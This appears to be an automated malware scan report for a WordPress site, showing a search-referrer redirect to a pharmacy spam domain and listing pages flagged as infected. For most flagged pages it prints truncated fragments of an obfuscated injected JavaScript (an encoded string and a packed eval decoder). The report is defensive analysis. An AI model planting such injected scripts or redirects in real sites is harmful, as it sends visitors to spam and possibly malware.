Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.uuone.net/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.uuone.net Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Cache-Control: no-cache, no-store, must-revalidate, max-age=0 Connection: close Date: Wed, 24 Sep 2014 08:22:24 GMT Location: http://topdrugstore-24h.com/site/search?q=www.uuone.net Server: LiteSpeed Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.27 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.uuone.net/ | 200 OK Content-Length: 43410 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4IDfwRHdodjM8BHd0hGf05WZtV3YvRGOywXek9mY8Rnbl1 Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://www.uuone.net/sample-page/ | 200 OK Content-Length: 29557 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4IDfwRHdodjM8BHd0hGf05WZtV3YvRGOywXek9mY8Rnbl1 Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://www.uuone.net/wp-admin/ | HTTP/1.1 302 Found Cache-Control: no-cache, no-store, must-revalidate, max-age=0 Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 24 Sep 2014 08:22:30 GMT Pragma: no-cache Location: http://www.uuone.net/wp-login.php?redirect_to=http%3A%2F%2Fwww.uuone.net%2Fwp-admin%2F&reauth=1 Server: LiteSpeed Content-Length: 0 Content-Type: text/html Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Powered-By: PHP/5.3.27 | clean |
http://www.uuone.net/wp-login.php?redirect_to=http%3a%2f%2fwww.uuone.net%2fwp-admin%2f&reauth=1 | 200 OK Content-Length: 2213 Content-Type: text/html | clean |
http://www.uuone.net/wp-login.php?action=lostpassword | 200 OK Content-Length: 1882 Content-Type: text/html | clean |
http://www.uuone.net/wp-login.php | 200 OK Content-Length: 2213 Content-Type: text/html | clean |
http://www.uuone.net/test404page.js | 404 Not Found Content-Length: 3 Content-Type: text/html | clean |
http://www.uuone.net/wp-login.php?redirect_to=http%3A%2F%2Fwww.uuone.net%2Fsample-page%2F | 200 OK Content-Length: 2216 Content-Type: text/html | clean |
http://www.uuone.net/2013/03/11/%e6%b2%bc%e6%b0%a3%e6%b1%a0/ | 200 OK Content-Length: 43449 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4IDfwRHdodjM8BHd0hGf05WZtV3YvRGOywXek9mY8Rnbl1 Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://www.uuone.net/category/uncategorized/ | 200 OK Content-Length: 38679 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4IDfwRHdodjM8BHd0hGf05WZtV3YvRGOywXek9mY8Rnbl1 Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://www.uuone.net/?p=94 | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 24 Sep 2014 08:22:39 GMT Location: http://www.uuone.net/2013/03/11/%e6%b2%bc%e6%b0%a3%e6%b1%a0/ Server: LiteSpeed Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.uuone.net/xmlrpc.php X-Powered-By: PHP/5.3.27 | clean |
http://www.uuone.net/2013/03/11/%e6%bf%be%e7%b4%99/ | 200 OK Content-Length: 30627 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4IDfwRHdodjM8BHd0hGf05WZtV3YvRGOywXek9mY8Rnbl1 Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://www.uuone.net/?p=92 | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 24 Sep 2014 08:22:42 GMT Location: http://www.uuone.net/2013/03/11/%e6%bf%be%e7%b4%99/ Server: LiteSpeed Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.uuone.net/xmlrpc.php X-Powered-By: PHP/5.3.27 | clean |
http://www.uuone.net/author/admin/ | 200 OK Content-Length: 39653 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4IDfwRHdodjM8BHd0hGf05WZtV3YvRGOywXek9mY8Rnbl1 Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://www.uuone.net/2013/03/11/%e6%b4%97/ | 200 OK Content-Length: 32135 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4IDfwRHdodjM8BHd0hGf05WZtV3YvRGOywXek9mY8Rnbl1 Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://www.uuone.net/?p=90 | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 24 Sep 2014 08:22:52 GMT Location: http://www.uuone.net/2013/03/11/%e6%b4%97/ Server: LiteSpeed Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.uuone.net/xmlrpc.php X-Powered-By: PHP/5.3.27 | clean |
http://www.uuone.net/wp-login.php?redirect_to=http%3A%2F%2Fwww.uuone.net%2F2013%2F03%2F11%2F%25e6%25b4%2597%2F | 200 OK Content-Length: 2225 Content-Type: text/html | clean |
http://www.uuone.net/2013/03/11/%e9%ab%98%e5%a3%93%e6%bb%85%e8%8f%8c/ | 200 OK Content-Length: 30430 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4IDfwRHdodjM8BHd0hGf05WZtV3YvRGOywXek9mY8Rnbl1 Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://www.uuone.net/?p=88 | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 24 Sep 2014 08:22:59 GMT Location: http://www.uuone.net/2013/03/11/%e9%ab%98%e5%a3%93%e6%bb%85%e8%8f%8c/ Server: LiteSpeed Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.uuone.net/xmlrpc.php X-Powered-By: PHP/5.3.27 | clean |
http://www.uuone.net/wp-login.php?redirect_to=http%3A%2F%2Fwww.uuone.net%2F2013%2F03%2F11%2F%25e9%25ab%2598%25e5%25a3%2593%25e6%25bb%2585%25e8%258f%258c%2F | 200 OK Content-Length: 2252 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=uuone.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://uuone.net/
Result: uuone.net is not infected or malware details are not published yet.
Result: uuone.net is not infected or malware details are not published yet.